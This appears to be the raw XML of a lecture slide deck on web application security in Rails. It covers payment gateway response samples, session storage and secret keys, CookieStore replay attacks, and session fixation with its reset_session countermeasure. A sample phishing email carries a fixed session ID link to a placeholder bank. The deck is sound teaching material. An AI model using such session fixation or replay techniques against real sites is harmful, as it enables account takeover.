              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;NOT AUTHORISED&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authcode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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>card_scheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;VISA&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>card_scheme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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CardTxn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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>datacash_reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;3340105259009953&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>datacash_reference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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>merchantreference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;3340105259009953&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>merchantreference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&lt;mode&gt;LIVE&lt;/mode&gt;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&lt;reason&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DECLINED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/reason&gt;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&lt;status&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/status&gt;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&lt;time&gt;1449024000&lt;/time&gt;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&lt;/Response&gt;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93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Failure Response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9000" y="1889125"/>
            <a:ext cx="72507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&lt;Response&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CardTxn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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;NOT AUTHORISED&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authcode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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>card_scheme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;VISA&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>card_scheme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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CardTxn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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>datacash_reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;3340105259009953&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>datacash_reference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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>merchantreference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;3340105259009953&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>merchantreference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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&lt;mode&gt;LIVE&lt;/mode&gt;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&lt;reason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUCCESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/reason&gt;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&lt;status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/status&gt;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&lt;time&gt;1449024000&lt;/time&gt;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&lt;/Response&gt;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23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11-07 at 14.54.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73" r="-12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9853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11-07 at 14.54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32" r="-168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7889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50800"/>
            <a:ext cx="4038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85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40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1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3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store large objects in a session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Critical data should not be stored in session.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0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Rails provides several storage mechanisms for the session hashes. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>since Rails 4, the default store is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EncryptedCookieStore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 err="1"/>
              <a:t>CookieStore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> saves the session hash directly in a cookie on the client-side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/>
              <a:t>Cookies imply a strict size limit of 4kB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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a server-side secret key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>secrets.secret_key_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>secrets.yml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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8219" y="4658295"/>
            <a:ext cx="735643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development:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_key_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a75d…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test:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_key_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>492f…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production:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_key_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: &lt;%= ENV["SECRET_KEY_BASE"] %&gt;	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140633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Replay Attacks for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>CookieStore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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works like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user receives credits, the amount is stored in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>session. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user buys something.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The new adjusted credit value is stored in the session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user takes the cookie from the first step (which they previously copied) and replaces the current cookie in the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user has their original credit back.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316627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Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="skd188256sdc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17" r="-27917"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6796363" y="4393340"/>
            <a:ext cx="1806357" cy="993427"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="skd188803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93" y="1532820"/>
            <a:ext cx="1075712" cy="889042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="j031677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8" y="4256541"/>
            <a:ext cx="1155788" cy="7608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7110" y="5342972"/>
            <a:ext cx="97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Attacker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5755" y="5017435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Victim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90172" y="2421862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www.example-bank.com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307167" y="4709583"/>
            <a:ext cx="49599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30500" y="4727419"/>
            <a:ext cx="394758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Email:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>“… check this out, there is a cool new account summary feature on our bank. Find out more at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.example-bank.com/?SID=d3dD25XfVpie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>  … “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449917" y="2688167"/>
            <a:ext cx="1354666" cy="131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1667" y="3227056"/>
            <a:ext cx="4496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Visits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.example-bank.com/?SID=d3dD25XfVpie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and logs in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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767917" y="2791194"/>
            <a:ext cx="1499193" cy="1465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02144" y="3846379"/>
            <a:ext cx="4496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Visits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.example-bank.com/?SID=d3dD25XfVpie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and has unlimited access to the victim’s account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633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Session Fixation - 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 a new session identifier and declare the old one invalid after a successful login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>create a new session in Rails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rgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reset_session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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18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1031</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>149</Paragraphs>
  <Slides>48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Advanced Web Application development</vt:lpstr>
      <vt:lpstr>Sessions</vt:lpstr>
      <vt:lpstr>Session ID</vt:lpstr>
      <vt:lpstr>Session Hijacking</vt:lpstr>
      <vt:lpstr>Session Guidelines</vt:lpstr>
      <vt:lpstr>Session Storage</vt:lpstr>
      <vt:lpstr>Replay Attacks for CookieStore Sessions</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>Session Fixation - Countermeasures</vt:lpstr>
      <vt:lpstr>Session Expiry</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CRSF Attack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CSRF Countermeasures</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Capture Connection Setting</vt:lpstr>
      <vt:lpstr>Libcurl supports:</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Rails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Payment Failure Response</vt:lpstr>
      <vt:lpstr>Payment Failure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Aberdeen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S C Lam</dc:creator>
  <cp:lastModifiedBy>Joey S C Lam</cp:lastModifiedBy>
  <cp:revision>90</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-06T21:16:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-08T08:57:15Z</dcterms:modified>
</cp:coreProperties>
</file>